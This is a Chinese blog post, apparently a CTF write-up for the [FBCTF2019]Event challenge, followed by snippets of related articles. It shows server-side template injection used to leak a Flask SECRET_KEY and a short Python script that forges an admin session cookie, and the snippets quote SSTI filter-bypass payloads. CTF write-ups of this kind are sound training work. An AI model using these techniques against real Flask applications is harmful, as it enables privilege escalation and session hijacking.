[FBCTF2019]Event(flask 伪造签名)

最新推荐文章于 2023-12-11 13:37:51 发布
原创 最新推荐文章于 2023-12-11 13:37:51 发布 · 363 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

本文介绍如何通过寻找Flask应用中的SECRET_KEY并利用该密钥伪造管理员签名,从而获得Admin权限的过程。文中详细展示了从获取密钥到伪造签名的具体步骤。

在这里插入图片描述
在这里插入图片描述
随便注册个号进来,发现一个记录事件的框

在这里插入图片描述
在这里插入图片描述
做了这么多,感觉又是 flask的后端,先看看 session有点像,这种两点分布的

在这里插入图片描述

{'_fresh': True, '_id': 'b261ddff44b088e87bc0598a56e2e77038ab9d21a8392dcb8f7133d06a94634f8efe8797234fe66f9943f036d84c6cc2b5fc25f81fbd1d43c39b89081996cdc5', 'user_id': '3'}

那下面就是找秘钥了,经过测试在 event_important处可以模板注入

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

有了秘钥,我们就可以伪造下面的 user的签名

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
# ImFkbWluIg.YwnA1g.Plkavr2RY7RnpGF7RCL3SVtiJ3g

替换 user,我们就获得了 admin权限

在这里插入图片描述

Flask Session 伪造全流程解析:从内存窃取到会话劫持
井底之蛙见世界
05-25 1620
摘要:本文探讨了Flask框架中Session伪造的安全风险及攻击流程。Flask默认将Session数据存储在客户端Cookie中,若攻击者获取应用的SECRET_KEY(可通过内存窃取),便可伪造合法Session。文章详细解析了从内存提取SECRET_KEY的步骤,包括定位进程、转储内存、搜索密钥等,并演示了如何构造伪造的Session数据及签名。此外,还介绍了使用flask-session-cookie-manager工具简化伪造过程的方法,以及相应的安全防范措施。该攻击可能导致身份劫持、数据篡改等
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 3177
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
BUUCTF:[FBCTF2019]Event
末初 · mochu7
07-29 1125
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
[FBCTF2019]Event
qq_45691294的博客
09-29 953
打开题目,只有一个登录注册框,无法使用admin登录注册 在 /flag 页面中提示我们并不是管理员,猜测要得到管理员权限才可以Get Flag 在主页看到表单,先随意输入一些值进去,页面回显了Name of your event 的值 这里有可能存在xss或者SSTI,尝试后,无css,应该存在SSTI 抓包发现cookie,event_sesh_cookie应该是jwt加密过 大致猜测出本题应该是可以通过SSTI得到密钥伪造cookie,越权登录admin的账户 在提交数据的时候,有三个可控参数
BUUCTF--[FBCTF2019]Event
qq_46263951的博客
08-14 299
进入页面,注册登录 访问flag 查看Cookie,这里很容易就猜到是要伪造Cookie 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名. 看大佬的wp知道 在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config 发现加密所需的密钥,伪造session from flask import Flask from flask.sessio...
BUUCTF [FBCTF2019] Event
Senimo
01-13 719
BUUCTF [FBCTF2019] Event 考点: Flask模版注入 伪造Session登陆 非常规格式SECRET_KEY加密 启动环境: 一个登陆注册页面,若点击Admin panel,提示: 使用Username:test,Password:test登陆后: 并没有限制登陆,可能是成功注册用户test 可以向数据库中添加新的事件,尝试添加: Name:hahaha Address:8.8.8.8 得到回显: 其选项框可以选择显示添加的事件名或事件地址 此时再次点击Admin p
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2721
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
[ctf web]flask session伪造 伪造admin
ShenZ的博客
08-06 1750
flask session 伪造 flask的session是在客户端的,因此可以尝试进行伪造伪造需要密钥,一般在app/config.py里面 SESSION解密脚本 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def
flask中的session伪造问题
m0_62422842的博客
09-05 3432
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
[FBCTF2019]RCEService 1
plant1234的博客
09-30 1014
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
python flask 接口签名sign原理及代码实
w1054230914的博客
02-03 1406
python flask 接口签名sign原理及代码实现
图片 flask json_基于flask的论坛签名档图片()
weixin_31034309的博客
01-09 291
两周前,签名(https://sig.dogcraft.top/img.jpg)的访问量自从有记录以来突破了一万次,为纪念访问量突破一万次,重写了大部分代码,并写了这篇搭建教程。基本原理原理并不复杂,浏览器向服务器请求图片时,浏览器会向服务器提供诸如IP地址、浏览器版本和访问时间等基本信息,服务器可以利用这些信息,生成相关的图片返回给浏览器,这样浏览器会收到一张写有用户端信息的独一无二...
CTF基础知识
weixin_68789096的博客
02-27 839
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。
CTF竞赛密码学题目解析
白帽子凯哥聊黑客
12-11 5518
CTF(Capture The Flag)竞赛是一个有趣的挑战。密码学是CTF竞赛中的核心元素之一,通常涉及解密、破译密码、理解加密算法等技能。以下是30个题目及答案,新入行的可以看看鸭。
CTF西普实验吧记错本--WEB
Grey的博客
04-30 3944
1.看起来有点难登陆题①首先万能密码登陆看看,无果,CTF的题不会那么简单②测试过滤了哪些字符③手工注入查看有哪些注入点,盲注也试试,最后发现有布尔型注入可以自己写python脚本,也可以sqlmap自带的脚本qlmap.py --url="http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=1&act...
通过OpenSSL创建自签名证书在Flask实现HTTPS
子燕若水的博客
03-01 1656
Generate a private keyopenssl genrsa -des3 -out server.key 1024 Generate a CSRopenssl req -new -key server.key -out server.csr Remove Passphrase from keycp server.key server.key.orgopenssl rsa -in server.key.org -out server.key Generat...
Flask】一种生成SECRET_KEY的方法
高岩 is me
11-11 4200
在终端中: →ipython →import os, base64 →a = os.urandom(66) 其中os.urandom(66),生成了一个66字节的字符串,保存到a,并且这个字符串每次都是不同的,如图: →base64.b64encode(a) →得到:'BPReyn0gMXT5uuaj/BYvZvBrz1+bzc66inOQxRth9+7EbjyTZJ5gvA6oX...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值